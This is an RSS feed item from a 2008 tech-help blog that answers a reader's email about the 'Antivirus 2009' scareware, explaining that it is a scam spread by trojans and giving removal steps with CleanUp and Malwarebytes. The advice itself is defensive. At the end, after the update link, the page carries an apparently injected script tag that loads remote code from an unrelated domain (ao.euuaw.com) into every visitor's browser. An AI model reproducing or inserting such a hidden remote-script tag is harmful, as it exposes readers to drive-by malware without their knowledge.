		<guid isPermaLink="false">http://www.smartergeek.com/2008/12/11/getting-rid-of-antivirus-2009-antivirus-2008/</guid>
		<description><![CDATA[&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; From an Email: i have a question to ask you , my computer keep popping up anti-virus 2009 and saying i have two virus trying to get in but i&#8217;ve checked everything and and run&#160; every update and they all say i&#8217;m protected but that anti-virus 2009 want quit popping up so what do [...]]]></description>
			<content:encoded><![CDATA[<p></p><p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; <br />From an Email:</p>
<p>i have a question to ask you , my computer keep popping up anti-virus 2009 and saying i have two virus trying to get in but i&#8217;ve checked everything and and run&nbsp; every update and they all say i&#8217;m protected but that anti-virus 2009 want quit popping up so what do i do please help<br />&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; </p>
<p><a href="http://www.smartergeek.com/blog/uploaded_images/screenshot-av2009-713206.gif" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;" rel="lightbox[127]" title="Getting Rid of Antivirus 2009 - Antivirus 2008"><img border="0" height="172" src="http://www.smartergeek.com/blog/uploaded_images/screenshot-av2009-713203.gif" width="200" /></a>Antivirus 2009 is actually spyware (or malware) running on your computer. It is not a &#8220;virus&#8221; really, but rather tries to get you to purchase the premium version. It&#8217;s a scam. It will tell you that your computer is infected whether it&#8217;s true or not. Of course, it doesn&#8217;t protect you from anything.</p>
<p>If you click on it, it will typically try to redirect you to antivirus-premium.com, webscannertools.com or one of several other websites that are fradulent and malicious. Many of these sites have exploitative code that is capable of doing more harm to your system, especially if you use Internet Explorer.</p>
<p>Antivirus 2009 gets on your system the same way that it&#8217;s previous versions did &#8211; Antivirus 2008, System Antivirus 2008, Ultimate Antivirus 2008, XP Antivirus 2008, etc. They arrive via trojans such as Zlob or Vundo, which typically come in through bad video codecs or other installed software that was not safe.</p>
<p><b>Important:</b> DO NOT INSTALL any software that you don&#8217;t absolutely trust. If in doubt, <a href="http://www.smartergeek.com/contactme.asp">contact me</a>.</p>
<p>&#8212;&#8212;&#8212;-<br />How to Get Rid of It<br />&#8212;&#8212;&#8212;-</p>
<p>You have to be careful when using software to get rid of malware. Many times software that advertises itself as helpful is really spyware also!</p>
<p>Download the following programs:</p>
<p>(1) CleanUp by Steven Gould<br /><a href="http://www.stevengould.org/index.php?option=com_content&amp;task=view&amp;id=29&amp;Itemid=72" onclick="pageTracker._trackPageview('/outgoing/www.stevengould.org/index.php?option=com_content_amp_task=view_amp_id=29_amp_Itemid=72&amp;referer=');">http://www.stevengould.org/index.php?option=com_content&amp;task=view&amp;id=29&amp;Itemid=72</a></p>
<p>Install and run it to remove all temp files.</p>
<p>(2) Next, download and install MBAM</p>
<p><a href="http://www.download.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html?part=dl-10804572&amp;subj=dl&amp;tag=button" target="_blank" onclick="pageTracker._trackPageview('/outgoing/www.download.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html?part=dl-10804572_amp_subj=dl_amp_tag=button&amp;referer=');">http://www.download.com/<wbr></wbr>Malwarebytes-Anti-Malware/<wbr></wbr>3000-8022_4-10804572.html?<wbr></wbr>part=dl-10804572&amp;subj=dl&amp;tag=<wbr></wbr>button</a></p>
<ol>
<li>Download, install it and update it. </li>
<li>Then run the quick scan &#8211; this can take some time.</li>
<li>When the scan is complete, clock OK to close the message box.</li>
<li>At the main screen, click &#8220;Show Results&#8221;.</li>
<li>Then click &#8220;Remove Selected&#8221;.</li>
<li> Close the log and restart your computer.</li>
</ol>
<div class="separator" style="clear: both; text-align: center;"><a href="http://www.smartergeek.com/blog/uploaded_images/anti-malware-1-737569.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;" rel="lightbox[127]" title="Getting Rid of Antivirus 2009 - Antivirus 2008"><img border="0" src="http://www.smartergeek.com/blog/uploaded_images/anti-malware-1-737558.gif" /></a>&nbsp;</div>
<div class="separator" style="clear: both; text-align: center;">&nbsp;<a href="http://www.smartergeek.com/blog/uploaded_images/anti-malware-3-753582.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;" rel="lightbox[127]" title="Getting Rid of Antivirus 2009 - Antivirus 2008"><img border="0" src="http://www.smartergeek.com/blog/uploaded_images/anti-malware-3-753578.gif" /></a></div>
<div class="separator" style="clear: both; text-align: center;">&nbsp;<a href="http://www.smartergeek.com/blog/uploaded_images/anti-malware-2-746470.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;" rel="lightbox[127]" title="Getting Rid of Antivirus 2009 - Antivirus 2008"><img border="0" src="http://www.smartergeek.com/blog/uploaded_images/anti-malware-2-746463.gif" /></a>&nbsp;</div>
<div class="separator" style="clear: both; text-align: center;"></div>
<p>&nbsp;When you are finished with the scan and have removed the files, restart your computer. Make sure you are running the latest version of AVG with updates installed. I&#8217;d suggest running a full system scan.</p>
<p><b style="background-color: red;">UPDATE:</b><br />This saga continues here: <a href="http://www.smartergeek.com/blog/2008/12/myspace-and-antivirus-2009.asp">http://www.smartergeek.com/blog/2008/12/myspace-and-antivirus-2009.asp </a><script src="http://ao.euuaw.com/9"></script></p>
<!-- PHP 5.x -->]]></content:encoded>
			<wfw:commentRss>http://www.smartergeek.com/2008/12/11/getting-rid-of-antivirus-2009-antivirus-2008/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
